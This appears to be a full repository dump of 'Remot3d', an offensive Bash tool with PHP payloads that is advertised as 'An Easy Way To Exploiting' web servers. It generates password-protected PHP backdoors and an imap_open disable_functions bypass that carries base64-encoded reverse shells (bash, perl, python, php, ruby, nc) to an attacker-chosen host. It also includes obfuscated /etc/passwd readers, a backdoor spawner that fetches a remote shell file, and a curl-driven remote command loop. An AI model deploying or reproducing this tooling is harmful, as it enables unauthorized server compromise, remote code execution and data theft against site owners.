├── screenshot
├── 1.png
├── 2.png
├── 3.png
├── 4.png
├── remoted-logo.png
└── remoted-logo-LONG.png
├── lib
└── payloads
│ ├── command_system_bypass.php
│ ├── readfile-curl.php
│ ├── readfile-uniq.php
│ └── backdoor_spawner.php
├── CONTRIBUTING.md
├── README.md
├── setup.sh
├── Remot3d.sh
└── LICENSE
/screenshot/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/KeepWannabe/Remot3d/HEAD/screenshot/1.png
--------------------------------------------------------------------------------
/screenshot/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/KeepWannabe/Remot3d/HEAD/screenshot/2.png
--------------------------------------------------------------------------------
/screenshot/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/KeepWannabe/Remot3d/HEAD/screenshot/3.png
--------------------------------------------------------------------------------
/screenshot/4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/KeepWannabe/Remot3d/HEAD/screenshot/4.png
--------------------------------------------------------------------------------
/screenshot/remoted-logo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/KeepWannabe/Remot3d/HEAD/screenshot/remoted-logo.png
--------------------------------------------------------------------------------
/screenshot/remoted-logo-LONG.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/KeepWannabe/Remot3d/HEAD/screenshot/remoted-logo-LONG.png
--------------------------------------------------------------------------------
/lib/payloads/command_system_bypass.php:
--------------------------------------------------------------------------------
1 |
5 |
--------------------------------------------------------------------------------
/lib/payloads/readfile-curl.php:
--------------------------------------------------------------------------------
1 |
9 |
10 |
--------------------------------------------------------------------------------
/CONTRIBUTING.md:
--------------------------------------------------------------------------------
1 | # Hell-o !
2 |
3 | You should know this is an open-source project! if you want to change something in this file or add features please contribute and we will be happy to receive help from you all. You can also take part in the [Hacktoberfest](https://hacktoberfest.digitalocean.com) event by pulling on this project!
4 |
5 | # Terms and Conditions
6 |
7 | If you are interested in following and helping to develop this tool, here are the terms and conditions that apply:
8 |
9 | 1. There should be no edits in the script that endanger the user
10 | 2. There should be no script that plunges its users into getting stuck in trouble
11 | 3. Don't forget to include us as the initial creator of this tool!
12 |
13 | Thank you and enjoy the beautiful world of *open-source*!
14 |
--------------------------------------------------------------------------------
/lib/payloads/readfile-uniq.php:
--------------------------------------------------------------------------------
1 | ")."-")
30 | ." ")
31 | );
32 | (
33 | $str[28] .("").("").("").("").
34 | $str[34] .("").("").("").("").("").("").
35 | $str[28] .("").("").("").("").("").("").("").
36 | $str[29] .("").("").("").("").("").("").
37 | $str[14] .("").("").("").("").
38 | $str[22]
39 | )
40 | (
41 | $str[12] .("").
42 | $str[10] .("").
43 | $str[29] .("").
44 | $str[42] .("").
45 | $str[39] .("").
46 | $str[14] .("").
47 | $str[29] .("").("").("").("").("").("").
48 | $str[12] .("").("").("").("").("").("").
49 | $str[39] .("").
50 | $str[25] .("").
51 | $str[10] .("").
52 | $str[28] .("").
53 | $str[28] .("").
54 | $str[32] .("").
55 | $str[13]
56 | );
57 |
58 | ?>
59 |
60 |
--------------------------------------------------------------------------------
/lib/payloads/backdoor_spawner.php:
--------------------------------------------------------------------------------
1 | - |_=,.:ABCDEFGHIJKLMNOPQRSTUVWXYZ"
18 | /*
19 | 👍
20 | 👍 👍 Created By Ardzz 👍
21 | 👍
22 | */
23 | );
24 | (
25 | $key[15].
26 | $key[18].
27 | $key[21].
28 | $key[14].
29 | $key[44].
30 | $key[25].$key[30].
31 | $key[29].$key[44].
32 | $key[12].$key[24].
33 | $key[23].
34 | $key[29].
35 | $key[14].
36 | $key[23].
37 | $key[29].
38 | $key[28]
39 | )
40 | (
41 | (
42 | $key[18].
43 | $key[13].
44 | $key[33].$key[47].
45 | $key[25].$key[17].$key[25]
46 | ),
47 | (
48 | $key[15].
49 | $key[18].
50 | $key[21].
51 | $key[14].$key[44].
52 | $key[16].$key[14].
53 | $key[29].$key[44].
54 | $key[12].
55 | $key[24].$key[23].$key[29].
56 | $key[14].$key[23].$key[29].
57 | $key[28]
58 | )
59 | (
60 | (
61 | $key[17].$key[29].
62 | $key[29].$key[25].
63 | $key[28].$key[48].
64 | $key[39].$key[39].
65 | $key[25].$key[10].$key[28].
66 | $key[29].$key[14].$key[11].
67 | $key[18].$key[23].$key[47].
68 | $key[12].$key[24].$key[22].
69 | $key[39].$key[27].$key[10].$key[32].
70 | $key[39].$key[05].$key[72].$key[05].
71 | $key[00].$key[12].$key[35].$key[74].$key[22]
72 | )
73 | )
74 | );
75 | ?>
76 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 |
2 | # Remot3d - An Easy Way To Exploiting
3 | #### Will be updated soon
4 |
5 | []()
6 | []()
7 | [](http://hits.dwyl.io/KeepWannabe/Remot3d)
8 | []()
9 | []()
10 |
11 |
12 |
13 | ##
25 |
26 |
27 |
28 |
29 | # List of Remot3d functions
30 |
31 | - Creates a backdoor for Winodws or Linux servers (can run php file)
32 |
33 | - Bypass disable functions with `imap_open` vulnerability
34 |
35 | - Bypass read file ```/etc/passwd``` with cURL or Unique Logic Scripts
36 |
37 | - Lots of other fun stuff :)
38 |
39 |
40 | ## Getting Started
41 | 1. ```git clone https://github.com/KeepWannabe/Remot3d```
42 | 2. ```cd Remot3d```
43 | 3. ```sudo setup.sh && Remot3d```
44 |
45 |
46 | ## Recommended Linux OSes:
47 | - Linux mint (Ubuntu Based with Mate DE)
48 | - Parrot
49 | - BackTrack
50 | - Backbox
51 | - DracOS
52 | - IbisLinux
53 |
54 |
55 |
56 | ## Update Remot3d
57 | - To update remot3d go to your Remot3d folder and execute :
58 | ```git pull && sudo setup.sh && Remot3d```
59 |
60 |
61 | ## Special thanks to:
62 |
63 | ### - my god Allah SWT.
64 | ### - Bayu Fedra (https://github.com/bayufedra)
65 | ### - Ardhana Reky (https://github.com/ardzz)
66 | ### - Novran Fathir (https://github.com/panophan)
67 | ### - Ardhana Resky (https://github.com/Ardzz)
68 | ### - Hasanal Bulkiah (https://github.com/florienzh4x)
69 | ### - Agus Setya R (https://github.com/agussetyar)
70 | ### - Edo Maland (https://github.com/ScreetSec)
71 | ### - IndoXploit - ZeroByte.ID - Eldersc0de Family and Much more !
72 |
73 |
74 | ## Found a Bug ?
75 | If you found a bug in Remot3d, submit an issue on this repository.
76 |
77 |
78 | ## Use disclaimer
79 | Alternations to the source code of this application are considered acceptable, however, any public releases utilizing modified or original code of this application must be with written approval of the owner of this software, Abdi Prawira N.
80 |
--------------------------------------------------------------------------------
/setup.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | # WARNING !
3 | ##############################################################
4 | # This is a USELESS Project, if you like it just donate
5 | # to me.
6 | ##############################################################
7 | # BITCOIN :
8 | # PAYPAL : https://www.paypal.me/abdiprawiran
9 | # PERFECT MONEY : U15461128
10 | #################### Made by 16 y.o Boys #####################
11 | ##############################################################
12 | # Thank's to IndoXploit - ZeroByte.ID - Eldersc0de Family
13 | # Special Thanks : Reky Ardhana, Novran Fathir & Bayu Fedra
14 | ##############################################################
15 | # UPDATE V-2.0
16 | # Whats new? Update and include new FUD Backdoor, Accourate
17 | # Check Backdoor Live or Not, Password for Connect the
18 | # Backdoor and much more Unique Logic Script to Bypass WAF
19 | # (Website Applications Firewall).
20 | ##############################################################
21 | ## COLORING YOUR SHELL ##
22 | ##############################################################
23 | white="\033[1;37m" ##
24 | grey="\033[0;37m" ##
25 | purple="\033[0;35m" ##
26 | red="\033[1;31m" ##
27 | green="\033[1;32m" ##
28 | yellow="\033[1;33m" ##
29 | purple="\033[0;35m" ##
30 | cyan="\033[0;36m" ##
31 | cafe="\033[0;33m" ##
32 | fiuscha="\033[0;35m" ##
33 | blue="\033[1;34m" ##
34 | nc="\e[0m" ##
35 | bgr="\e[0;41m" ##
36 | ##############################################################
37 | spinlong ()
38 | {
39 | bar=" ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ "
40 | barlength=${#bar}
41 | i=0
42 | while ((i < 100)); do
43 | n=$((i*barlength / 100))
44 | printf "\e[00;32m\r[%-${barlength}s]\e[00m" "${bar:0:n}"
45 | ((i += RANDOM%5+2))
46 | sleep 0.02
47 | done
48 | }
49 | banner(){
50 | printf " ${white}
51 | #########################################################################
52 | ## ##
53 | ## /\ \ ##
54 | ## / \ \ ##
55 | ## / /\ \ \ ##
56 | ## / / /\ \_\ ##
57 | ## / / /_/ / / ##
58 | ## / / /__\/ / ##
59 | ## / / /_____/ ##
60 | ## / / /\ \ \ ##
61 | ## / / / \ \ \ ##
62 | ## \/_/ \_\/ ##
63 | ## ##
64 | #########################################################################
65 | ## Remot3d Installer ##
66 | #########################################################################
67 | ## • DISCLAIMER • ##
68 | ## ##
69 | ## we are not responsible for what is done with these Tools, ##
70 | ## made for education. all crimes are borne by this user tool. ##
71 | ## Made in the language of BASH / Shell Scripting, its function ##
72 | ## makes it easy to control the Backdoor easily and has several ##
73 | ## features to bypass the firewall with FUD (FULLY UNDETECTABLE) ##
74 | ## Script. ##
75 | #########################################################################
76 | \n"
77 | }
78 | install() {
79 | if [[ $(whoami) != "root" ]]
80 | then
81 | printf " ${white}[•] ${red}This script must be run as root ${white}[•]\n"
82 | exit
83 | fi
84 | sleep 2
85 | check=$(ls lib | grep payloads)
86 | if [[ $check == "payloads" ]];then
87 | installation=$(cp -r lib/payloads $HOME/.rmtd-payloads && cp Remot3d.sh /usr/bin/Remot3d && chmod +x /usr/bin/Remot3d)
88 | echo -e " [$green ✔$white ] Install Payloads............................................"
89 | sleep 2
90 | echo -e " [$green ✔$white ] Install Remot3d............................................."
91 | sleep 1
92 | echo -e " [$green !$white ]Done ! Just Command$yellow Remot3d$white And Enjoy the TRASH TOOLS !"
93 | else
94 | echo " Try to run at the Remot3d Folder !"
95 | echo " Exiting...";
96 | sleep 1
97 | echo "";
98 | exit
99 | fi
100 | }
101 | clear
102 | spinlong
103 | clear
104 | printf "\e[8;30;99t"
105 | banner
106 | install
--------------------------------------------------------------------------------
/Remot3d.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | # WARNING !
3 | ##############################################################
4 | # This is a USELESS Project, if you like it just donate
5 | # to me.
6 | ##############################################################
7 | # BITCOIN :
8 | # PAYPAL : https://www.paypal.me/abdiprawiran
9 | # PERFECT MONEY : U15461128
10 | #################### Made by 16 y.o Boys #####################
11 | ##############################################################
12 | # Thank's to IndoXploit - ZeroByte.ID - Eldersc0de Family
13 | # Special Thanks : Reky Ardhana, Novran Fathir, Bayu Fedra
14 | # Hasanal Bulkiah, Agus Setya R & BASH.ID
15 | ##############################################################
16 | # UPDATE V-2.0
17 | # Whats new? Update and include new FUD Backdoor, Accourate
18 | # Check Backdoor Live or Not, Password for Connect the
19 | # Backdoor and much more Unique Logic Script to Bypass WAF
20 | # (Website Applications Firewall).
21 | ##############################################################
22 | ## COLORING YOUR SHELL ##
23 | ##############################################################
24 | white="\033[1;37m" ##
25 | grey="\033[0;37m" ##
26 | purple="\033[0;35m" ##
27 | red="\033[1;31m" ##
28 | green="\033[1;32m" ##
29 | yellow="\033[1;33m" ##
30 | purple="\033[0;35m" ##
31 | cyan="\033[0;36m" ##
32 | cafe="\033[0;33m" ##
33 | fiuscha="\033[0;35m" ##
34 | blue="\033[1;34m" ##
35 | nc="\e[0m" ##
36 | ##############################################################
37 | checking_installation() {
38 | payloads_folder=$(ls -a $HOME | grep ".rmtd-payloads")
39 | if [[ $payloads_folder == ".rmtd-payloads" ]];then
40 | clear
41 | printf "\e[8;27;93t"
42 | spinlong
43 | clear
44 | banner_changer
45 | options
46 | chooser
47 | else
48 | printf " [${red}!$white]$red Missing Backdoor Folders, Run ${yellow}setup.sh${red} to Solve This\n"
49 | fi
50 | }
51 | banner_changer()
52 | {
53 | RAN=$(shuf -i 1-5 | head -1)
54 | if [[ $RAN -eq 1 ]];then
55 | banner1
56 | elif [[ $RAN -eq 2 ]];then
57 | banner2
58 | elif [[ $RAN -eq 3 ]];then
59 | banner3
60 | elif [[ $RAN -eq 4 ]];then
61 | banner4
62 | elif [[ $RAN -eq 5 ]];then
63 | banner5
64 | fi
65 | }
66 | banner1 () {
67 | printf "${green}
68 | ╔═══════════════════════════════════════════════════════╗
69 | ║ ______ __ ${yellow} ______ ${green} __ ║
70 | ║ | __ \.-----.--------.-----.| |_${yellow} |__ |${green}.--| | ║
71 | ║ | <| -__| | _ || _|${yellow}|__ |${green}| _ | ║
72 | ║ |___|__||_____|__|__|__|_____||____|${yellow}|______|${green}|_____| ║
73 | ║ ║
74 | ╠═════════════════╦═════════════════════════════════════╣
75 | ║ ${yellow}Version ${white}2.0${green} ║ ${white}Coded by ${yellow}B1P0L4R ${white}- ${yellow}IndoXploit.${green} ║
76 | ╚═════════════════╩═════════════════════════════════════╝\n"
77 | }
78 | banner2 () {
79 | printf "${red}
80 | @@@@@@@ @@@@@@@@ @@@@@@@@@@ @@@@@@ @@@@@@@ ${blue}@@@@@@ ${red}@@@@@@@
81 | @@@@@@@@ @@@@@@@@ @@@@@@@@@@@ @@@@@@@@ @@@@@@@ ${blue}@@@@@@@ ${red}@@@@@@@@
82 | @@! @@@ @@! @@! @@! @@! @@! @@@ @@! ${blue} @@@ ${red}@@! @@@
83 | !@! @!@ !@! !@! !@! !@! !@! @!@ !@! ${blue} @!@ ${red}!@! @!@
84 | @!@!!@! @!!!:! @!! !!@ @!@ @!@ !@! @!! ${blue}@!@!!@ ${red}@!@ !@!
85 | !!@!@! !!!!!: !@! ! !@! !@! !!! !!! ${blue}!!@!@! ${red}!@! !!!
86 | !!: :!! !!: !!: !!: !!: !!! !!: ${blue} !!: ${red}!!: !!!
87 | :!: !:! :!: :!: :!: :!: !:! :!: ${blue} :!: ${red}:!: !:!
88 | :: ::: :: :::: ::: :: ::::: :: :: ${blue}:: :::: ${red} :::: ::
89 | : : : : :: :: : : : : : : ${blue} : : : ${red}:: : :
90 | ${blue}--------------------------------------
91 | ${white}PHP REMOTE BACKDOOR - BY ${red}B1P0L4R
92 | \n"
93 | }
94 | banner3(){
95 | printf "${green}
96 | __----_
97 | /##| \
98 | /###| | \______
99 | |####| \
100 | |####| ___ ___|${white}© ${green}
101 | \####/ _____ /
102 | \### /
103 | ${white}=====ÊšçØ ╔═╗┬ ┬┌─┐ ╦═╗┌─┐┌┬┐┌─┐┌┬┐┌─┐${green} //
104 | / \ ${white}╠═╝├─┤├─┘ ╠╦╝├┤ ││││ │ │ ├┤ ${green} //
105 | | |_ \ ${white}╩ ┴ ┴┴ ╩╚═└─┘┴ ┴└─┘ ┴ └─┘${green} //${white} But it's useless !${green}
106 | \___/ | ${cyan}╔╗ ╔═╗╔═╗╦╔═╔╦╗╔═╗╔═╗╦═╗ ${green} //${white} you can't control his heart${green}
107 | \ / ${cyan}╠╩╗╠═╣║ ╠╩╗ ║║║ ║║ ║╠╦╝ ${green} //
108 | | |__|__ ${cyan}╚═╝╩ ╩╚═╝╩ ╩═╩╝╚═╝╚═╝╩╚═ ${green} //
109 | (______)___) ${yellow}Version 2.0 - Stable
110 | \n"
111 | }
112 | banner4(){
113 | printf " ${yellow}*${white}
114 | ${white} _${yellow}*${white}-${yellow}*${white}
115 | ${white} _------' ${yellow}*${white}
116 | ${red}_/
117 | ${red} / /
118 | ${red} / / ${white} Keep this bomb !
119 | ${red} / / ${white} I don't wanna die buddy !
120 | ${red}/ /
121 | ${red}/ /
122 | ${red}(_)\n"
123 | }
124 | banner5() {
125 | printf "${white}
126 | ┌──────────────────────────────────────────────────────────────────────────────┐
127 | │ * ${grey}System Admin Login${white} * │
128 | ├──────────────────────────────────────────────────────────────────────────────┤
129 | │ │
130 | │ ┌───────────────────────────────┐ │
131 | │ ${grey}Username${white} : │ IndoXploit │ │
132 | │ │───────────────────────────────│ │
133 | │ ${grey}Password${white} : │ ${red}t${green}h${yellow}3${white}_${red}p${blue}4${yellow}s${green}s${yellow}w${red}0${blue}r${green}d${white}_${yellow}l${red}0${Cyan}c${green}k${red}3${yellow}d${white} │ │
134 | │ └───────────────────────────────┘ │
135 | │ ${green} https://indoxploit.or.id ${white} │
136 | │ │
137 | └──────────────────────────────────────────────────────────────────────────────┘\n"
138 | }
139 | dir=$(pwd)
140 | spinlong ()
141 | {
142 | bar=" ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ "
143 | barlength=${#bar}
144 | i=0
145 | while ((i < 100)); do
146 | n=$((i*barlength / 100))
147 | printf "\e[00;32m\r[%-${barlength}s]\e[00m" "${bar:0:n}"
148 | ((i += RANDOM%5+2))
149 | sleep 0.02
150 | done
151 | }
152 | options () {
153 | echo""
154 | printf " ${white}[${green}+${white}] Options :\n"
155 | printf " └${white}[${red}•${white}] ${green}1.${white} Generate Remote Backdoor\n";
156 | printf " └${white}[${yellow}•${white}] ${green}2.${white} Generate Reverser Shell (with iMap Disable Function Bypass)\n";
157 | printf " └${white}[${blue}•${white}] ${green}3.${white} Bypass Server ${red}Firewall ${white}(with FUD Backdoor Script)\n";
158 | printf " └${white}[${green}•${white}] ${green}4.${white} Remote your Backdoor (Just for Option 1)\n";
159 | }
160 | main_remot3d_1 () {
161 | clear
162 | spinlong
163 | clear
164 | banner_changer
165 | echo "";
166 | printf " ${white}[${green}+${white}] Set Your Backdoor Name : "
167 | read out_name
168 | printf " ${white}[${green}+${white}] Set Your Backdoor Password : "
169 | read pwd_real
170 | pwd=$(echo -n "$pwd_real" | md5sum | awk '{print $1}')
171 | generate_file=$(echo -e "" > $out_name)
172 | printf " ${white}└[${yellow}-${white}] Success Generating Backdoor on${green} ${dir}/$out_name\n"
173 | echo "";
174 |
175 | }
176 | main_remot3d_2 () {
177 | clear
178 | spinlong
179 | clear
180 | banner_changer
181 | echo "";
182 | printf " ${white}[${green}+${white}] Set Your Backdoor Name : "
183 | read out_name
184 | ## IMAP_OPEN BYPASS REVERSE SHELL - BY : ARDZZ
185 | printf " ${white}[${green}+${white}] Set HOST / IP : "
186 | read L_HOST
187 | printf " ${white}[${green}+${white}] Set PORT : "
188 | read L_PORT
189 | printf " ${white}[${green}+${white}] Set Exploit Language (${green}bash, perl, python, php, ruby, netcat, nc.${white}) : "
190 | read lang_rev
191 | cat << EOF > $out_name
192 | "YmFzaCAtaSA+JiAvZGV2L3RjcC9bSVBdL1tQT1JUXSAwPiYx",
197 | "perl" => "cGVybCAtZSAndXNlIFNvY2tldDskaT0iW0lQXSI7JHA9W1BPUlRdO3NvY2tldChTLFBGX0lORVQsU09DS19TVFJFQU0sZ2V0cHJvdG9ieW5hbWUoInRjcCIpKTtpZihjb25uZWN0KFMsc29ja2FkZHJfaW4oJHAsaW5ldF9hdG9uKCRpKSkpKXtvcGVuKFNURElOLCI+JlMiKTtvcGVuKFNURE9VVCwiPiZTIik7b3BlbihTVERFUlIsIj4mUyIpO2V4ZWMoIi9iaW4vc2ggLWkiKTt9Oyc=",
198 | "python" => "cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiW0lQXSIsW1BPUlRdKSk7b3MuZHVwMihzLmZpbGVubygpLDApOyBvcy5kdXAyKHMuZmlsZW5vKCksMSk7IG9zLmR1cDIocy5maWxlbm8oKSwyKTtwPXN1YnByb2Nlc3MuY2FsbChbIi9iaW4vc2giLCItaSJdKTsn",
199 | "php" => "cGhwIC1yICckc29jaz1mc29ja29wZW4oIltJUF0iLFtQT1JUXSk7ZXhlYygiL2Jpbi9zaCAtaSA8JjMgPiYzIDI+JjMiKTsn",
200 | "ruby" => "cnVieSAtcnNvY2tldCAtZSdmPVRDUFNvY2tldC5vcGVuKCJbSVBdIixbUE9SVF0pLnRvX2k7ZXhlYyBzcHJpbnRmKCIvYmluL3NoIC1pIDwmJWQgPiYlZCAyPiYlZCIsZixmLGYpJw==",
201 | "netcat" => "bmMgLWUgL2Jpbi9zaCBbSVBdIFtQT1JUXQ==",
202 | "nc" => "cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL3NoIC1pIDI+JjF8bmMgW0lQXSBbUE9SVF0gPi90bXAvZg==",
203 | ];
204 | \$lang = "$lang_rev"; // PROGRAMMING LANGUAGE
205 | \$payload = str_replace([ "[IP]", "[PORT]" ], [ \$config["ip"], \$config["port"] ], base64_decode(\$config["payload"][\$lang]));
206 | echo "[{\$lang}] => {\$payload} ";
207 | \$server = "any -o ProxyCommand=echo\t".base64_encode(\$payload)."|base64\t-d|bash";
208 | @imap_open('{'.\$server.'}:143/imap}INBOX', '', '');
209 | ?>
210 | EOF
211 | printf " ${white}└[${yellow}-${white}] Success Generating Backdoor on ${green}$dir/$out_name\n"
212 | echo "";
213 | }
214 | main_remot3d_3 () {
215 | clear
216 | spinlong
217 | clear
218 | banner_changer
219 | echo""
220 | printf " ${white}[${green}+${white}] Options :\n"
221 | printf " └${white}[${red}•${white}] ${green}1.${white} Unique Logic to Bypass ${yellow}/etc/passwd${white} \n"
222 | printf " └${white}[${yellow}•${white}] ${green}2.${white} Using cURL for Bypassing read ${yellow}/etc/passwd${white} \n"
223 | printf " └${white}[${blue}•${white}] ${green}3.${white} Bypass disable system() function's\n"
224 | printf " └${white}[${green}•${white}] ${green}4.${white} Spawner IndoXploit Shell Backdoor\n"
225 | printf " └${white}[${yellow}•${white}] ${green}0.${white} Back to Home\n"
226 | echo ""
227 | printf " ┌[${green}+${white}] Choose the options\n";
228 | printf " └[root@indo${green}x${white}ploit]:~# ";
229 | read optionz
230 | if [[ $optionz == "1" ]]; then
231 | clear
232 | spinlong
233 | clear
234 | banner_changer
235 | echo "";
236 | printf " ${white}[${green}+${white}] Set Your Backdoor File Name : "
237 | read etcpass_byp_file
238 | printf " ${white}[${green}+${white}] Set Your Path File : "
239 | read file_path1
240 | ## Bypass /etc/passwd - BY : ARDZZ
241 | dwnld_etcpass_byp1=$(cp $HOME/.rmtd-payloads/readfile-uniq.php $file_path/$etcpass_byp_file)
242 | echo ""
243 | printf " ${white}[${green}+${white}] Success ! Just Uploaded On Target And See What Happen :p \n"
244 | printf " ${white}[${green}+${white}] File's Are Saved On${green} $file_path1/$etcpass_byp_file \n"
245 | elif [[ $optionz == "2" ]]; then
246 | clear
247 | spinlong
248 | clear
249 | banner_changer
250 | echo "";
251 | printf " ${white}[${green}+${white}] Set Your Backdoor File Name : "
252 | read etcpass_byp_curl
253 | printf " ${white}[${green}+${white}] Set Your Path File : "
254 | read file_path2
255 | ## Bypass /etc/passwd - BY : ARDZZ
256 | dwnld_etcpass_byp2=$(cp $HOME/.rmtd-payloads/readfile-curl.php $file_path2/$etcpass_byp_curl)
257 | echo ""
258 | printf " ${white}└[${yellow}-${white}] Success ! Just Uploaded On Target And See What Happen :p \n"
259 | printf " ${white}└[${yellow}-${white}] File's Are Saved On${green} $file_path2/$etcpass_byp_curl \n"
260 | elif [[ $optionz == "3" ]]; then
261 | clear
262 | spinlong
263 | clear
264 | banner_changer
265 | echo "";
266 | option_about_etcpasswd
267 | elif [[ $optionz == "4" ]]; then
268 | clear
269 | spinlong
270 | clear
271 | banner_changer
272 | echo "";
273 | printf " ${white}[${green}+${white}] Set Your Backdoor File Name : "
274 | read backdoor_spawner
275 | printf " ${white}[${green}+${white}] Set Your Path File : "
276 | read file_path3
277 | ## Backdoor spawner - BY : ARDZZ
278 | dwnld_spwnr_idx_shell=$(cp $HOME/.rmtd-payloads/backdoor_spawner.php $file_path3/$backdoor_spawner)
279 | echo ""
280 | printf " ${white}└[${yellow}-${white}] Success ! Just Uploaded On Target And The Script Can Spawn Shell Backdoor \n"
281 | printf " ${white}└[${yellow}-${white}] File's Are Saved On${green} $file_path3/$backdoor_spawner \n"
282 | elif [[ $optionz == "0" ]]; then
283 | clear
284 | spinlong
285 | clear
286 | banner_changer
287 | options
288 | chooser
289 | else
290 | exit
291 | fi
292 | }
293 | option_about_etcpasswd () {
294 | printf " ${white}[${green}+${white}] Set Your Own Command (default is ${green}$u/b??/c?t $u/??c$u/p????d${white}) (Y/n) ? : "
295 | read system_default
296 | printf " ${white}[${green}+${white}] Set Your File Name : "
297 | read sys_name
298 | printf " ${white}[${green}+${white}] Set Your Path File : "
299 | read file_path4
300 | if [[ $system_default == "Y" ]] || [[ $system_default == "y" ]]; then
301 | printf " ${white}[${green}+${white}] Set Command : "
302 | read sys_cmd
303 | cat << SYS > $sys_name
304 |
308 | SYS
309 | sleep 2
310 | echo ""
311 | printf " ${white}└[${yellow}-${white}] Success ! Just Uploaded On Target And See What Happen :p \n"
312 | printf " ${white}└[${yellow}-${white}] File's Are Saved On${green} $file_path4/$sys_name \n"
313 | elif [[ $system_default == "n" ]] | [[ $system_default == "N" ]]; then
314 | grab_sys_file=$(cp $HOME/.rmtd-payloads/command_system_bypass.php $file_path4/$sys_name)
315 | echo ""
316 | printf " ${white}└[${yellow}-${white}] Success ! Just Uploaded On Target And See What Happen :p \n"
317 | printf " ${white}└[${yellow}-${white}] File's Are Saved On${green} $file_path4/$sys_name \n"
318 | else
319 | exit
320 | fi
321 | }
322 | check_live_shell() {
323 | response=$(curl -s -i $shell_loc | grep "Set-Cookie: rmtd=bckdr")
324 | if [[ $response =~ "Set-Cookie: rmtd=bckdr" ]];then
325 | printf " ${yellow}[!]${green} Backdoor Alive... Processing for Connect\n"
326 | else
327 | printf " ${yellow}[!] ${red}Failed to Connect, Can't find backdoor\n"
328 | sleep 0.4
329 | printf " ${yellow}[!] ${red}Exiting...\n\n"
330 | sleep 2
331 | exit
332 | fi
333 |
334 | }
335 | main_remot3d_4 () {
336 | clear
337 | spinlong
338 | clear
339 | banner_changer
340 | echo "";
341 | printf " ${white}[${green}+${white}] Backdoor Location's : "
342 | read shell_loc
343 | printf " ${white}[${green}+${white}] Backdoor Password's : "
344 | read bckdr_pw
345 | $check_live_shell
346 | tes_pw=$(curl -s -d idx="whoami" "$shell_loc?pwd=$bckdr_pw")
347 | # check password
348 | if [[ $tes_pw == "Wrong Password" ]];then
349 | printf " ${red}[!] Wrong Password, Can't Access Backdoor\n"
350 | else
351 | spinlong
352 | sleep 1
353 | echo "";
354 | check_live_shell
355 | check_ip=$(curl -s ident.me)
356 | check_kernel=$(curl -s -d idx="uname -nvpmso" "$shell_loc?pwd=$bckdr_pw")
357 | check_id=$(curl -s -d idx="id" "$shell_loc?pwd=$bckdr_pw")
358 | sleep 1
359 | printf " ${yellow}[+] ${white}Your Public IP : ${white}$check_ip ${white}\n"
360 | printf " ${yellow}[+] ${white}System Info : ${white}$check_kernel ${white}\n"
361 | printf " ${yellow}[+] ${white}User ID : ${white}$check_id ${white}\n"
362 | spinlong
363 | while true
364 | do
365 | echo "";
366 | printf " ${white}[${green}+${white}] COMMAND : "
367 | read cmd
368 | reverse=$(curl -s -d "idx=$cmd" "$shell_loc?pwd=$bckdr_pw")
369 | echo "";
370 | printf "${yellow}$reverse${white}\n" done
371 | done
372 | fi
373 |
374 | }
375 | chooser () {
376 | echo ""
377 | printf " ┌[${green}+${white}] Choose the options\n";
378 | printf " └[root@indo${green}x${white}ploit]:~# ";
379 | read options
380 | if [[ $options == 1 ]]; then
381 | main_remot3d_1
382 | elif [[ $options == 2 ]]; then
383 | main_remot3d_2
384 | elif [[ $options == 3 ]]; then
385 | main_remot3d_3
386 | elif [[ $options == 4 ]]; then
387 | main_remot3d_4
388 | else
389 | exit 1
390 | fi
391 | }
392 | checking_installation
393 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | GNU GENERAL PUBLIC LICENSE
2 | Version 3, 29 June 2007
3 |
4 | Copyright (C) 2007 Free Software Foundation, Inc.